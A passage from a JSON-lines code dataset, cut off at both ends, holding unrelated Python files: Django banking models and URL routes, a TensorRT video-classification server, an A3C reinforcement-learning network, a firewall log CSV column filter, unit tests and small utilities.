transform=ax[0].transAxes,\n horizontalalignment='center', verticalalignment='top', bbox=box)\n ax[1].text(\n 0.5, 0.98, 'EVALUATION', transform=ax[1].transAxes,\n horizontalalignment='center', verticalalignment='top', bbox=box)\n\n train_name = DEFAULT_TRAIN_METRIC\n valid_name = DEFAULT_VALID_METRIC\n\n single_run.plot(x='epoch', y=train_name, ax=ax[0], legend=False)\n single_run.plot(x='epoch', y=valid_name, ax=ax[1], legend=False)\n\n ymin = np.min((np.min(single_run[train_name]), np.min(\n single_run[valid_name]))) * 0.95\n ymax = np.max((np.percentile(single_run[train_name], 95), np.percentile(\n single_run[valid_name], 95)))\n xmin = np.min(single_run['epoch'])-np.max(single_run['epoch'])*0.01\n xmax = np.max(single_run['epoch'])*1.01\n\n ax[0].set_xlim(xmin, xmax)\n ax[0].set_ylim(ymin, ymax)\n ax[0].yaxis.set_label_coords(-0.15, 0.5, transform=ax[0].transAxes)\n ax[0].set_ylabel('loss', bbox=box)\n\n fig.savefig(savepath, bbox_inches='tight', dpi=200, transparent=True)\n","sub_path":"src/utils/summarize_runs.py","file_name":"summarize_runs.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633716451","text":"from django.urls import path\n\nfrom rest_framework_simplejwt.views import TokenRefreshView\n\nfrom . import views\n\napp_name = 'user'\n\nurlpatterns = [\n path('login/', views.UserLoginApiView.as_view(), name='login'),\n path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n path('google/token/', views.google_login_token, name='google-token'),\n path('me/', views.UserRetrieveUpdateApiView.as_view(), name='me')\n]\n","sub_path":"user_panel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530891854","text":"from django.db import models, transaction\n\n\nclass MoneyField(models.DecimalField):\n \"\"\"Use decimal for money, floating point is a no-no.\"\"\"\n def __init__(self, **kwargs):\n kwargs['max_digits'] = 20\n kwargs['decimal_places'] = 2\n return super(MoneyField, self).__init__(**kwargs)\n\n\nclass Customer(models.Model):\n \"\"\"Customer metadata\"\"\"\n name = models.CharField(max_length=100)\n\n\nclass Account(models.Model):\n \"\"\"Individual account owned by a customer. IDs are unique.\"\"\"\n owner = models.ForeignKey('Customer')\n balance = MoneyField()\n\n\nclass Transfer(models.Model):\n \"\"\"\n Record of a money transfer between accounts.\n\n For auditing and because it is likely that when we display transactions\n we will want to show the value of the account at the time, we also store\n the value of the accounts prior to the transfer.\n \"\"\"\n from_account = models.ForeignKey('Account',\n related_name='from_account_transfers',\n db_index=True)\n to_account = models.ForeignKey('Account',\n related_name='to_account_transfers',\n db_index=True)\n previous_from_balance = MoneyField()\n previous_to_balance = MoneyField()\n amount = MoneyField()\n time = models.DateTimeField(auto_now=True)\n\n\ndef create_account(customer_id, deposit):\n \"\"\"Creates a new account for a customer, returns the ID.\"\"\"\n account = Account.objects.create(owner_id=customer_id, balance=deposit)\n return account.id\n\n\ndef get_accounts(customer_id):\n \"\"\"Returns a list of all accounts owned by the customer.\"\"\"\n customer = Customer.objects.get(id=customer_id)\n return [a.id for a in customer.account_set.iterator()]\n\n\ndef transfer_money(from_account_id, to_account_id, amount):\n \"\"\"\n Move money between two accounts.\n\n Note that there is no checking for whether money is available. We assume\n this is okay because a bank employee is doing the operation and overdrafts\n are fine. If it were a customer, we would still allow it but change them a\n ridiculous fee.\n \"\"\"\n from_account = Account.objects.get(id=from_account_id)\n to_account = Account.objects.get(id=to_account_id)\n transfer = Transfer.objects.create(\n from_account_id = from_account_id,\n to_account_id = to_account_id,\n previous_from_balance = from_account.balance,\n previous_to_balance = to_account.balance,\n amount = amount\n )\n # Do updates atomically. The previous balances could be off.\n # Depending on the DB backend it's probably possible to do some\n # SELECT FOR UPDATE locking trickery or similar to guarantee\n # consistency.\n with transaction.atomic():\n affected = Account.objects.filter(id=from_account_id)\\\n .update(balance=models.F('balance') - amount)\n if affected != 1:\n raise ValueError('Atomic update failed')\n affected = Account.objects.filter(id=to_account_id)\\\n .update(balance=models.F('balance') + amount)\n if affected != 1:\n raise ValueError('Atomic update failed')\n return transfer.previous_from_balance, transfer.previous_to_balance\n\n\ndef get_balance(account_id):\n \"\"\"Returns the current dollar value of an account.\"\"\"\n account = Account.objects.get(id=account_id)\n return account.balance\n\n\ndef get_transfer_history(account_id):\n \"\"\"Returns all transfers involving the given account.\"\"\"\n account = Account.objects.get(id=account_id)\n transfers = list()\n transfers.extend(account.from_account_transfers.iterator())\n transfers.extend(account.to_account_transfers.iterator())\n transfers.sort(key=lambda x: x.time, reverse=True)\n return [{\n 'from_account_id': t.from_account_id,\n 'to_account_id': t.to_account_id,\n 'previous_from_balance': t.previous_from_balance,\n 'previous_to_balance': t.previous_to_balance,\n 'amount': t.amount,\n 'time': t.time\n } for t in transfers]\n","sub_path":"employee/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"286249734","text":"#!/usr/bin/env python3\n\n### Copyright 2017 Adam Maynard\n### Licensed under the Apache License, Version 2.0 (the \"License\");\n### you may not use this file except in compliance with the License.\n### You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n\n# Build for PAN-OS 8\n\n## Export Palo Alto threat log as csv, then use this to filter the junk\nimport pandas as pd\n#Rename your csv file and remove \".csv\" if you want to append later\ninfile = input(\"Enter the CSV file location (E:/Users/someuser/somefile.csv): \")\n#savefile = input(\"Enter the CSV save file location (E:/Users/someuser/savefile.csv): \")\nf=pd.read_csv(infile)\nkeep_col = ['Receive Time','Source address','Destination address','Application','Repeat Count','Source Port','Destination Port','IP Protocol','URL/Filename','Threat/Content Name','Source Country','Destination Country']\nnew_f = f[keep_col]\nnew_f.to_csv(infile + \"-log.csv\", index=False)\n","sub_path":"csv-filter-threat-8_old.py","file_name":"csv-filter-threat-8_old.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"505193678","text":"import torch\nimport torch.nn as nn\nfrom easydict import EasyDict as edict\nfrom pathlib import Path\nimport torchvision.transforms as trans\n\ndef get_basic_config():\n conf = edict()\n conf.data_path = Path('/home/zzh/dataset/faces_emore/imgs')\n conf.valid_path = Path('/home/zzh/faces_emore')\n conf.work_space = Path('work')\n conf.model_path = conf.work_space / 'models'\n\n conf.input_size = [112, 112]\n conf.embedding_size = 512\n\n conf.net_mode = 'ir_se' # 'ir' or 'ir_se'\n conf.net_depth = 50\n conf.drop_ratio = 0.6\n conf.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # conf.device = torch.device('cpu')\n conf.test_transform = trans.Compose([\n trans.ToTensor(),\n trans.Normalize([0.5,0.5,0.5], [0.5,0.5,0.5])\n ])\n conf.data_mode = 'faces_emore'\n conf.batch_size = 100 # irse net depth 50\n\n # --------------------Training Config ------------------------\n conf.log_path = conf.work_space / 'log'\n conf.save_path = conf.work_space / 'save'\n\n conf.lr = 1e-3\n conf.milestones = [12, 15, 18]\n conf.momentum = 0.9\n conf.pin_memory = True\n conf.num_workers = 3\n conf.ce_loss = nn.CrossEntropyLoss()\n\n # --------------------Inference Config ------------------------\n conf.facebank_path = conf.data_path / 'facebank'\n conf.threshold = 1.5 # margin m\n conf.face_limit = 10\n conf.min_face_size = 30\n\n return conf\n\nif __name__ == '__main__':\n args = get_config()\n print(args.epochs)","sub_path":"basic_config.py","file_name":"basic_config.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567730468","text":"import os\nimport sys\n\nfile_path = sys.argv[1]\nout_file_path = sys.argv[2]\n\ncolumn_size_dict = {}\n\n# Build a dictionary with the column index as key and width of the column as value\nwith open(file_path, 'rb') as my_file:\n header_items = my_file.readline().rstrip(b\"\\n\").split(b\"\\t\")\n\n # Start with a default width of 1, which accounts for the padding at the right\n for i in range(len(header_items)):\n column_size_dict[i] = 1\n\n# Iterate through the lines to find the max width for each column\nwith open(file_path, 'rb') as my_file:\n for line in my_file:\n line_items = line.rstrip(b\"\\n\").split(b\"\\t\")\n\n for i in range(len(line_items)):\n column_size_dict[i] = max([column_size_dict[i], len(line_items[i]) + 1])\n\n# Save the data to an output file with the proper padding\nwith open(file_path, 'rb') as my_file:\n with open(out_file_path, 'wb') as out_file:\n for line in my_file:\n line_items = line.rstrip(b\"\\n\").split(b\"\\t\")\n\n line_out = \"\"\n for i in sorted(column_size_dict.keys()):\n format_string = \"{:<\" + str(column_size_dict[i]) + \"}\"\n column_value = format_string.format(line_items[i].decode())\n line_out += column_value\n\n out_file.write(line_out[:-1].encode() + b\"\\n\")\n","sub_path":"ConvertTsvToFixedWidthFile.py","file_name":"ConvertTsvToFixedWidthFile.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"500777493","text":"# -*- coding: utf-8 -*-\nfrom collections import namedtuple\nimport torch\nimport tensorrt as trt\nimport acap3d, acap\nimport numpy as np\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nfrom pycuda.compiler import SourceModule\nimport os\n\n\nclass ServerApi(object):\n def __init__(self, gpu_id=0):\n self.d = np.load('../dictlshi.npy').tolist()\n self.dtype = np.float32\n self.final_shape = (4, 448, 448)\n self.batch_size = 4\n\n TRT_LOGGER = trt.Logger(trt.Logger.INFO)\n runtime = trt.Runtime(TRT_LOGGER)\n # resnet-101-aic-448-9000-b32-f640 res101-encode30-pytorch-b32-f640\n # f = open('/data/resnet-101-aic-448-9190-b4-b32-f128.engine', 'rb')\n f1 = open('../resnet-101-aic-448-acapfixall-9556-b32-f128-max2.engine', 'rb')\n self.engine1 = runtime.deserialize_cuda_engine(f1.read())\n f2 = open('../resnet-101-aic-448-acapfixall-9556-b32-f128-max2.engine', 'rb')\n self.engine2 = runtime.deserialize_cuda_engine(f2.read())\n f3 = open('../resnet-101-aic-448-acapfixall-9538-b32-f128.engine', 'rb')\n self.engine3 = runtime.deserialize_cuda_engine(f3.read())\n f4 = open('../resnet-101-aic-448-acapfixall-9556-b32-f128.engine', 'rb')\n self.engine4 = runtime.deserialize_cuda_engine(f4.read())\n\n self.input_shape1 = [self.batch_size, *self.engine1.get_binding_shape(0)]\n self.output_shape1 = [self.batch_size, *self.engine1.get_binding_shape(1)]\n self.output_shape2 = [self.batch_size, *self.engine2.get_binding_shape(1)]\n self.output_shape3 = [self.batch_size, *self.engine3.get_binding_shape(1)]\n self.output_shape4 = [self.batch_size, *self.engine4.get_binding_shape(1)]\n print(self.output_shape2)\n print(self.output_shape1)\n print(self.input_shape1)\n self.h_input1 = cuda.pagelocked_empty(self.input_shape1, dtype=np.float32)\n self.h_output1 = cuda.pagelocked_empty(self.output_shape1, dtype=np.float32)\n self.h_output2 = cuda.pagelocked_empty(self.output_shape2, dtype=np.float32)\n self.h_output3 = cuda.pagelocked_empty(self.output_shape3, dtype=np.float32)\n self.h_output4 = cuda.pagelocked_empty(self.output_shape4, dtype=np.float32)\n # Allocate device memory for inputs and outputs.\n self.d_input1 = cuda.mem_alloc(self.h_input1.nbytes)\n self.d_output1 = cuda.mem_alloc(self.h_output1.nbytes)\n self.d_output2 = cuda.mem_alloc(self.h_output2.nbytes)\n self.d_output3 = cuda.mem_alloc(self.h_output3.nbytes)\n self.d_output4 = cuda.mem_alloc(self.h_output4.nbytes)\n # Create a self.stream in which to copy inputs/outputs and run inference.\n self.stream1 = cuda.Stream()\n self.stream2 = cuda.Stream()\n self.stream3 = cuda.Stream()\n self.stream4 = cuda.Stream()\n # self.stream = trt.\n self.context1 = self.engine1.create_execution_context()\n self.context2 = self.engine2.create_execution_context()\n self.context3 = self.engine3.create_execution_context()\n self.context4 = self.engine4.create_execution_context()\n\n self.buf = np.zeros((self.final_shape[0], 2000, 2000, 3), dtype=np.uint8)\n # self.clip = np.zeros((self.final_shape[0], 3, self.resize_shape[0], self.resize_shape[1]), dtype=self.dtype)\n\n self.cap = acap3d.acap3d()\n # videolist = ['/data/231125424.mp4', '/data/963193352.mp4']\n # for i in range(50):\n # video = videolist[i%2]\n # self.cap.decode(video, self.final_shape[0], self.final_shape[1], 1, self.h_input.ctypes._data,\n # self.buf.ctypes._data)\n\n def handle(self, video_dir):\n # print('before decode')\n self.cap.decode(video_dir, self.final_shape[0], self.final_shape[1], 1, self.h_input1.ctypes._data, self.buf.ctypes._data)\n # print('after decode')\n cuda.memcpy_htod_async(self.d_input1, self.h_input1, self.stream1)\n # Run inference.\n # print('before exec')\n self.context1.execute(batch_size=2, bindings=[int(self.d_input1), int(self.d_output1)])\n self.context2.execute(batch_size=2, bindings=[int(self.d_input1), int(self.d_output2)])\n # self.context1.execute_async(batch_size=4, bindings=[int(self.d_input1), int(self.d_output1)],\n # stream_handle=self.stream1.handle)\n\n # self.context2.execute_async(batch_size=2, bindings=[int(self.d_input1), int(self.d_output2)],\n # stream_handle=self.stream2.handle)\n #\n # self.context3.execute_async(batch_size=1, bindings=[int(self.d_input1), int(self.d_output3)],\n # stream_handle=self.stream3.handle)\n #\n # self.context4.execute_async(batch_size=1, bindings=[int(self.d_input1), int(self.d_output4)],\n # stream_handle=self.stream4.handle)\n\n # Transfer predictions back from the GPU.\n cuda.memcpy_dtoh_async(self.h_output1, self.d_output1, self.stream1)\n cuda.memcpy_dtoh_async(self.h_output2, self.d_output2, self.stream2)\n # cuda.memcpy_dtoh_async(self.h_output3, self.d_output3, self.stream3)\n # cuda.memcpy_dtoh_async(self.h_output4, self.d_output4, self.stream4)\n # Synchronize the self.stream\n self.stream1.synchronize()\n self.stream2.synchronize()\n # self.stream3.synchronize()\n # self.stream4.synchronize()\n # print(self.h_output2.shape)\n prob1 = self.h_output1.mean(0).mean(-1).mean(-1)\n prob2 = self.h_output2.mean(0).mean(-1).mean(-1)\n # prob3 = self.h_output3.mean(0).mean(-1).mean(-1)\n # prob4 = self.h_output4.mean(0).mean(-1).mean(-1)\n # prob = prob1 + prob2+ prob3+ prob4\n prob = prob1 + prob2\n # prob = prob1\n pred = np.argsort(prob)[::-1][0]\n print(pred)\n # if isinstance(self.d[pred], tuple):\n # res = list(self.d[pred])\n # else:\n # res = list([self.d[pred]])\n # print(res)\n res = self.d[pred]\n return res\n\n\nif __name__ == '__main__':\n import line_profiler\n\n file = '../231125424.mp4'\n s = ServerApi()\n # s.handle('../231125424.mp4')\n profile = line_profiler.LineProfiler(s.handle)\n profile.run('s.handle(file)')\n profile.print_stats()\n","sub_path":"aic_tensorrt_acap_2s/infer/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"375826331","text":"from pretalx.orga.signals import nav_event\n\n\ndef orga_events(request):\n \"\"\"\n Adds data to all template contexts\n \"\"\"\n\n _nav_event = []\n if getattr(request, 'event', None) and request.user.is_authenticated:\n for receiver, response in nav_event.send(request.event, request=request):\n _nav_event += response\n\n return {'nav_event': _nav_event}\n","sub_path":"src/pretalx/orga/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"166365928","text":"import mock\nimport unittest\n\nimport numpy\nfrom six.moves import cPickle\n\nfrom smqtk.representation.descriptor_element.local_elements import \\\n DescriptorFileElement\n\n\nclass TestDescriptorFileElement (unittest.TestCase):\n\n def test_configuration1(self):\n default_config = DescriptorFileElement.get_default_config()\n self.assertEqual(default_config,\n {\n 'save_dir': None,\n 'subdir_split': None,\n })\n\n default_config['save_dir'] = '/some/path/somewhere'\n default_config['subdir_split'] = 4\n\n #: :type: DescriptorFileElement\n inst1 = DescriptorFileElement.from_config(default_config,\n 'test', 'abcd')\n self.assertEqual(default_config, inst1.get_config())\n self.assertEqual(inst1._save_dir, '/some/path/somewhere')\n self.assertEqual(inst1._subdir_split, 4)\n\n # vector-based equality\n inst2 = DescriptorFileElement.from_config(inst1.get_config(),\n 'test', 'abcd')\n self.assertEqual(inst1, inst2)\n\n def test_vec_filepath_generation(self):\n d = DescriptorFileElement('test', 'abcd', '/base', 4)\n self.assertEqual(d._vec_filepath,\n '/base/a/b/c/test.abcd.vector.npy')\n\n d = DescriptorFileElement('test', 'abcd', '/base', 2)\n self.assertEqual(d._vec_filepath,\n '/base/ab/test.abcd.vector.npy')\n\n d = DescriptorFileElement('test', 'abcd', '/base', 1)\n self.assertEqual(d._vec_filepath,\n '/base/test.abcd.vector.npy')\n\n d = DescriptorFileElement('test', 'abcd', '/base', 0)\n self.assertEqual(d._vec_filepath,\n '/base/test.abcd.vector.npy')\n\n d = DescriptorFileElement('test', 'abcd', '/base')\n self.assertEqual(d._vec_filepath,\n '/base/test.abcd.vector.npy')\n\n def test_serialization(self):\n # Test that an instance can be serialized and deserialized via pickle\n # successfully.\n ex_type = 'test'\n ex_uid = 12345\n ex_save_dir = 'some-dir'\n ex_split = 5\n e1 = DescriptorFileElement(ex_type, ex_uid, ex_save_dir, ex_split)\n\n # pickle dump and load into a new copy\n #: :type: DescriptorFileElement\n e2 = cPickle.loads(cPickle.dumps(e1))\n # Make sure the two have the smme attributes, including base descriptor\n # element things.\n self.assertEqual(e1.type(), e2.type())\n self.assertEqual(e1.uuid(), e2.uuid())\n self.assertEqual(e1._save_dir, e2._save_dir)\n self.assertEqual(e1._subdir_split, e2._subdir_split)\n self.assertEqual(e1._vec_filepath, e2._vec_filepath)\n\n @mock.patch('smqtk.representation.descriptor_element.local_elements'\n '.numpy.save')\n @mock.patch('smqtk.representation.descriptor_element.local_elements'\n '.file_utils.safe_create_dir')\n def test_vector_set(self, mock_scd, mock_save):\n d = DescriptorFileElement('test', 1234, '/base', 4)\n self.assertEqual(d._vec_filepath,\n '/base/1/2/3/test.1234.vector.npy')\n\n v = numpy.zeros(16)\n d.set_vector(v)\n mock_scd.assert_called_with('/base/1/2/3')\n mock_save.assert_called_with('/base/1/2/3/test.1234.vector.npy', v)\n\n @mock.patch('smqtk.representation.descriptor_element.local_elements'\n '.numpy.load')\n def test_vector_get(self, mock_load):\n d = DescriptorFileElement('test', 1234, '/base', 4)\n self.assertFalse(d.has_vector())\n self.assertIs(d.vector(), None)\n\n d.has_vector = mock.Mock(return_value=True)\n self.assertTrue(d.has_vector())\n v = numpy.zeros(16)\n mock_load.return_value = v\n numpy.testing.assert_equal(d.vector(), v)\n","sub_path":"python/smqtk/tests/representation/DescriptorElement/test_DescriptorFileElement.py","file_name":"test_DescriptorFileElement.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"53853590","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def getDepth(self, root):\n d = 0\n while root.left:\n root = root.left\n d += 1\n return d\n\n def exists(self, root, d, ind):\n left = 0\n right = 2**d - 1\n\n node = root\n\n while left < right:\n pivot = left + (right - left) // 2\n if ind <= pivot:\n node = node.left\n right = pivot\n else:\n node = node.right\n left = pivot + 1\n\n return node\n\n def countNodes(self, root: TreeNode) -> int:\n if not root:\n return 0\n\n depth = self.getDepth(root)\n if depth == 0:\n return 1\n\n left = 0\n right = 2**depth - 1\n\n while left <= right:\n pivot = left + (right - left) // 2\n if self.exists(root, depth, pivot):\n left = pivot + 1\n else:\n right = pivot - 1\n\n return ( 2**depth - 1 ) + left\n\n\n \n","sub_path":"222_Count Complete Tree Nodes/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313292813","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom hyper_parameters import *\nfrom global_parameters import *\n\nclass AcNet(object):\n '''\n Class: A3C network\n '''\n def __init__(self, scope, globalAC=None):\n '''\n :param scope: The network it belongs to\n :param globalAC: The global_net name\n '''\n self.SESS = get_value('SESS')\n self.OPT_A = get_value('OPT_A')\n self.OPT_C = get_value('OPT_C')\n\n if scope == GLOBAL_NET_SCOPE:\n '''Global_net initialization'''\n with tf.variable_scope(scope):\n self.s = tf.placeholder(dtype=tf.float32, shape=[None, N_S], name='S')\n self.a_params, self.c_params = self._build_net(scope)[-2:] ### the last 2 return of build_net function\n else:\n with tf.variable_scope(scope):\n self.s = tf.placeholder(dtype=tf.float32, shape=[None, N_S], name='S')\n self.a_his = tf.placeholder(dtype=tf.int32, shape=[None, N_A], name='A')\n self.v_target = tf.placeholder(dtype=tf.float32, shape=[None, 1], name='Vtarget')\n self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)\n td = tf.subtract(self.v_target, self.v, name='TD_Error')\n\n with tf.name_scope('c_loss'):\n self.c_loss = tf.reduce_mean(tf.square(td))\n\n with tf.name_scope('a_loss'):\n log_prob = tf.reduce_sum(\n tf.log(self.a_prob + 1e-5) * tf.one_hot(indices=self.a_his, depth=N_A, dtype=tf.float32),\n axis=1,\n keep_dims=True)\n exp_v = log_prob * tf.stop_gradient(td)\n entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),\n axis=1,\n keep_dims=True)\n self.exp_v = exp_v + ENTROPY_BETA * entropy\n self.a_loss = tf.reduce_mean(-self.exp_v)\n\n with tf.name_scope('local_grad'):\n self.a_grads = tf.gradients(self.a_loss, self.a_params)\n self.c_grads = tf.gradients(self.c_loss, self.c_params)\n\n with tf.name_scope('sync'):\n with tf.name_scope('pull'):\n self.pull_a_params = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]\n self.pull_c_params = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]\n with tf.name_scope('push'):\n self.push_a_params = self.OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))\n self.push_c_params = self.OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))\n\n def _build_net(self, scope):\n '''\n :param scope: The network it belongs to\n :return: a_prob (M * N), v, a_params, c_params\n '''\n with tf.variable_scope('actor'):\n ### Variable\n # W_a1 = tf.Variable(tf.truncated_normal([N_S, UNIT_A], stddev=0.5), dtype=tf.float32, name='W_a1')\n # b_a1 = tf.Variable(tf.zeros([UNIT_A]), dtype=tf.float32, name='b_a1')\n # W_a2 = tf.Variable(tf.truncated_normal([UNIT_A, UNIT_A], stddev=0.5), dtype=tf.float32, name='W_a2')\n # b_a2 = tf.Variable(tf.zeros([UNIT_A]), dtype=tf.float32, name='b_a2')\n # W_prob = tf.Variable(tf.truncated_normal([UNIT_A, N_A], stddev=0.5), dtype=tf.float32, name='W_prob')\n # b_prob = tf.Variable(tf.zeros([N_A]), dtype=tf.float32, name='b_prob')\n # activation = tf.nn.relu(tf.nn.bias_add(tf.matmul(self.s, W_a1),b_a1))\n layer_a1 = tf.layers.dense(inputs = self.s,\n units = UNIT_A,\n activation = tf.nn.relu6,\n kernel_initializer = W_INIT,\n name = 'layer_a1')\n layer_a2 = tf.layers.dense(inputs = layer_a1,\n units = UNIT_A,\n activation = tf.nn.relu6,\n kernel_initializer = W_INIT,\n name = 'layer_a2')\n a_prob = tf.layers.dense(inputs=layer_a2,\n units=N_A, ### N_A = M*N\n activation=tf.nn.sigmoid,\n kernel_initializer=W_INIT,\n name = 'a_prob')\n with tf.variable_scope('critic'):\n # W_c1 = tf.Variable(tf.truncated_normal([N_S, UNIT_C], stddev=0.2), dtype=tf.float32, name='W_c1')\n # b_c1 = tf.Variable(tf.zeros([UNIT_A]), dtype=tf.float32, name='b_c1')\n # W_c2 = tf.Variable(tf.truncated_normal([UNIT_C, UNIT_C], stddev=0.2), dtype=tf.float32, name='W_c2')\n # b_c2 = tf.Variable(tf.zeros([UNIT_A]), dtype=tf.float32, name='b_c2')\n # W_v = tf.Variable(tf.truncated_normal([UNIT_C, 1], stddev=0.2), dtype=tf.float32, name='W_v')\n # b_v = tf.Variable(tf.zeros([1]), dtype=tf.float32, name='b_v')\n layer_c1 = tf.layers.dense(inputs = self.s,\n units = UNIT_C,\n activation = tf.nn.relu6,\n kernel_initializer = W_INIT,\n name = 'layer_c1')\n layer_c2 = tf.layers.dense(inputs = layer_c1,\n units = UNIT_C,\n activation = tf.nn.relu6,\n kernel_initializer = W_INIT,\n name = 'layer_c2')\n v = tf.layers.dense(inputs = layer_c2,\n units = 1,\n kernel_initializer = W_INIT,\n name = 'v')\n a_params = tf.get_collection(key=tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')\n c_params = tf.get_collection(key=tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')\n return a_prob, v, a_params, c_params\n\n def choose_action(self, s): ## ?\n '''\n :param s: state\n :return: action\n '''\n action = self.SESS.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})\n return action\n\n def pull_global(self):\n '''\n Pull operation: Pull the up-to-date parameters to the local_net from the global_net\n '''\n self.SESS.run([self.pull_a_params, self.pull_c_params])\n\n def update_global(self, feed_dict):\n '''\n Push operation: Push the up-to-date parameters to the global_net from the local_net\n Run by a local_net\n :param feed_dict: feed_dict\n '''\n self.SESS.run([self.push_a_params, self.push_c_params], feed_dict)\n\n\n\n","sub_path":"AcNet.py","file_name":"AcNet.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"573759708","text":"''' smem.py - one function, init memory from prelearned thots included in dna '''\n\nimport sam.mind\n\ndef initMemory():\n\tfriendhouse = sam.mind.Node('house').modify('of', 'friend')\n\tClaw('you', 'go').modify('where', friendhouse).modify('why', Claw('you', 'pickup', 'food'))\n\tClaw('Sam', 'go').modify('where', friendhouse).modify('why', Claw('Sam', 'deliver', 'food'))\n\tClaw('John', 'go').modify('where', friendhouse).modify('why', Claw('John', 'eat', 'food'))\n\tClaw('Naiyana', 'go').modify('where', 'Bangkok').modify('why', Claw('Naiyana', 'visit'))\n\tClaw('Sam', 'go').modify('where', 'Chiang_Mai').modify('why', 'vacation')\n\tClaw('John', 'go').modify('where', 'Pai').modify('why', Claw('John', 'go', 'embassy'))\n\tClaw('Juan', 'go').modify('where', 'bank').modify('why', Claw('Juan', 'get', 'money'))\n\n\tClaw('John', 'go').modify('where', 'coffeeshop').modify('why', Claw('John', 'drink', 'coffee'))\n\tClaw('Sam', 'go').modify('where', 'coffeeshop').modify('why', Claw('Sam', 'eat', 'breakfast'))\n\tClaw('Juan', 'go').modify('where', 'coffeeshop').modify('why', Claw('Juan', 'meet', 'friend'))\n\n\tdef work(who, where, whyv, whyo=None):\n\t\tClaw(who, 'go').modify('where', where).modify('why', Claw(who, whyv, whyo))\n\t\n\twork('John', 'restaurant', 'eat', 'food')\n\twork('Sam', 'restaurant', 'meet', 'friend')\n\twork('Naiyana', 'salon', 'wash', 'hair')\n\twork('Juan', 'salon', 'cut', 'hair')\n\twork('John', 'salon', 'get', 'pedicure')\n\twork('Sam', 'salon', 'get', 'manicure')\n\twork('Sam', 'market', 'buy', 'food')\n\twork('Naiyana', 'mall', 'shop')\n\twork('Juan', 'pharmacy', 'buy', 'medicine')\n\twork('Juan', 'cinema', 'watch', 'movie')\n\twork('Sam', 'doctor', 'get', 'checkup')\n\twork('Juan', 'doctor', 'fix', 'headache')\n\twork('Naiyana', 'doctor', 'test', 'covid')\n\twork('you', 'hospital', 'visit', 'friend')\n\twork('I', 'clinic', 'see', 'doctor')\n\twork('Sam', 'clinic', 'see', 'dentist')\n\twork('Sam', 'dentist', 'clean', 'teeth')\n\twork('Naiyana', 'dentist', 'get', 'filling')\n\twork('John', 'dentist', 'get', 'whitening')\n\twork('Juan', 'dentist', 'fix', 'toothache')\n\twork('you', 'dentist', 'remove', 'tooth')\n\twork('I', 'dentist', 'get', 'braces')\n\t\n\tdef work(who, which, period):\n\t\tClaw(who, 'go').modify('when', Node(period).modify('which', which))\n\t\n\twork('Sam', 'this', 'morning') \n\twork('Joe', 'this', 'afternoon') \n\twork('Nid', 'this', 'evening') \n\twork('Nui', 'last', 'week') \n\twork('Sam', 'this', 'week') \n\twork('Joe', 'next', 'week') \n\twork('Nid', 'last', 'month') \n\twork('Nui', 'this', 'month') \n\twork('Sam', 'next', 'month') \n\twork('Joe', 'last', 'year') \n\twork('Nid', 'this', 'year') \n\twork('Nui', 'next', 'year') \n\n\tClaw('Nui', 'go').modify('when', 'now')\n\tClaw('Sam', 'go').modify('when', 'yesterday')\n\tClaw('Joe', 'go').modify('when', 'today')\n\tClaw('Nid', 'go').modify('when', 'tomorrow')\n\n\t# where and how: local vs distant destinations and mode of travel\n\tdef work(who, where, how):\n\t\tClaw(who, 'go').modify('where', where).modify('how', how)\n\t\n\twork('Nui', 'Bangkok', 'train') \n\twork('Nid', 'Chiang_Mai', 'bus') \n\twork('Joe', 'Udon_Thani', 'airplane') \n\twork('Sam', 'Koh_Samui', 'ship') \n\t\n\twork('Joe', 'bank' , 'car') \n\twork('Nid', 'coffeeshop', 'Grab') \n\twork('Nui', 'restaurant', 'taxi') \n\twork('Sam', 'salon' , 'citybus') \n\twork('Joe', 'market' , 'songtaew')\n\twork('Nid', 'mall' , 'tuktuk') \n\t\t \n\tClaw('Sam', 'go').modify('where', 'dentist').modify('how', 'run')\n\tClaw('Joe', 'go').modify('where', 'clinic').modify('how', 'walk')\n\n\tdef work(who, where, 